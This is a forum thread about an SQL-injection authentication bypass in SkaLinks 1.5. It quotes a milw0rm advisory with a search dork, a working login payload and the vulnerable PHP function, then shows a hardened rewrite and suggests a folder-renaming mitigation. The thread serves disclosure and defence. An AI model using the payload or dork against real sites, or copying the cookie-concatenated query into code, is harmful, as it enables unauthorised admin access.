sqlinjection Member
Posted: 26 Dec 2009 16:30:18
It appears that skalinks is hardly updated; V1.5, the latest version, is from 2006.
As found by googling "powered by skalinks", result #5 is: http://www.milw0rm.com/exploits/7932
########################################
# Product : SkaLinks                   #
# Version : 1.5                        #
# Dork    : Powered by SkaLinks        #
# Site    : http://www.skalinks.com/   #
# Found by: Dimi4                      #
# Date    : 29.01.09                   #
# Greetz  : antichat                   #
########################################
SQL-injection, Auth Bypass
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1' OR 1=1/*
Bug Function:
// Vulnerable as shipped: both cookie values are concatenated straight into the
// SQL string, so a crafted `adminname` cookie rewrites the WHERE clause and the
// password comparison never takes effect.
function IsAdmin( )
{
    $table_name = $this->m_AdminsTable;
    $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='" . $_COOKIE['adminname'] . "' AND `Password`='" . $_COOKIE['pwd'] . "'" );
    if ( !$res )
    {
        return 0;       // no matching row: not an admin
    }
    else
    {
        return $res;    // first matching row is treated as the logged-in admin
    }
}
(c) Dimi4, 2009 greetz to antichat
# milw0rm.com [2009-01-30]
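The IsAdmin() check above in a hardened form, as an added example that is neither SkaLinks code nor the advisory author's. It assumes a PDO connection ($pdo), that session_start() has already been called, and that the `Password` column stores a password_hash() result rather than a plaintext password; the class and method names are hypothetical.

```php
<?php
// Added example, not SkaLinks code. Assumes: a PDO connection ($pdo), that
// session_start() has already been called, and that the `Password` column
// stores a password_hash() result instead of a plaintext password.
class AdminAuth
{
    private $pdo;
    private $m_AdminsTable;
    public function __construct(PDO $pdo, $table)
    {
        // A table name cannot be a bound parameter, so restrict its characters first.
        if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
            throw new InvalidArgumentException('invalid admins table name');
        }
        $this->pdo = $pdo;
        $this->m_AdminsTable = $table;
    }
    // Login: the submitted name is a bound parameter, so a value such as
    // 1' OR 1=1/* is compared literally instead of rewriting the WHERE clause.
    // Only the admin name is kept server-side; no password is placed in a cookie.
    public function login($name, $password)
    {
        $stmt = $this->pdo->prepare("SELECT `Name`, `Password` FROM `{$this->m_AdminsTable}` WHERE `Name` = :name LIMIT 1");
        $stmt->execute([':name' => $name]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if (!$row || !password_verify($password, $row['Password'])) {
            return false;   // unknown admin or wrong password
        }
        session_regenerate_id(true);   // new session id across the privilege change
        $_SESSION['admin_name'] = $row['Name'];
        return true;
    }
    // Replacement for IsAdmin(): trusts only the server-side session, never the
    // client-writable adminname/pwd cookies, and still uses a prepared statement.
    public function isAdmin()
    {
        if (empty($_SESSION['admin_name'])) {
            return 0;
        }
        $stmt = $this->pdo->prepare("SELECT * FROM `{$this->m_AdminsTable}` WHERE `Name` = :name LIMIT 1");
        $stmt->execute([':name' => $_SESSION['admin_name']]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ? $row : 0;   // same return convention as the original
    }
}
```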
sqlinjection Member
Posted: 26 Dec 2009 16:34:57
Sorry, #2 search result... SO ALMOST EVERYONE LOOKING FOR THAT SEARCH TERM WOULD NOTICE THIS VULNERABILITY.
My recommendation for now, until skalinks is updated (if applicable), is to change the admin folder to something difficult to guess (I recommend hyphens, numbers...) and change headers.php ( $_skalinks_url['admin'] and $_skalinks_dir['admin'] ) to point to the new folder.
Only Heavy Metal Member
Posted: 2 Jan 2010 04:02:36 | Edited by: Only Heavy Metal
Hi
I did exactly what you said. I changed the name of the admin folder and changed headers.php ( $_skalinks_url['admin'] and $_skalinks_dir['admin'] ).
I am getting this message in the admin. Did I forget something?
Warning: opendir(/home/directory/public_html/links-exchange/admin/db_backup/) [function.opendir]: failed to open dir: No such file or directory in /home/directory/public_html/links-exchange/admin2/index.php on line 178
I changed my folder name to "directory" in the message above; I don't want to show my real folder here.
Cheers,
Edwin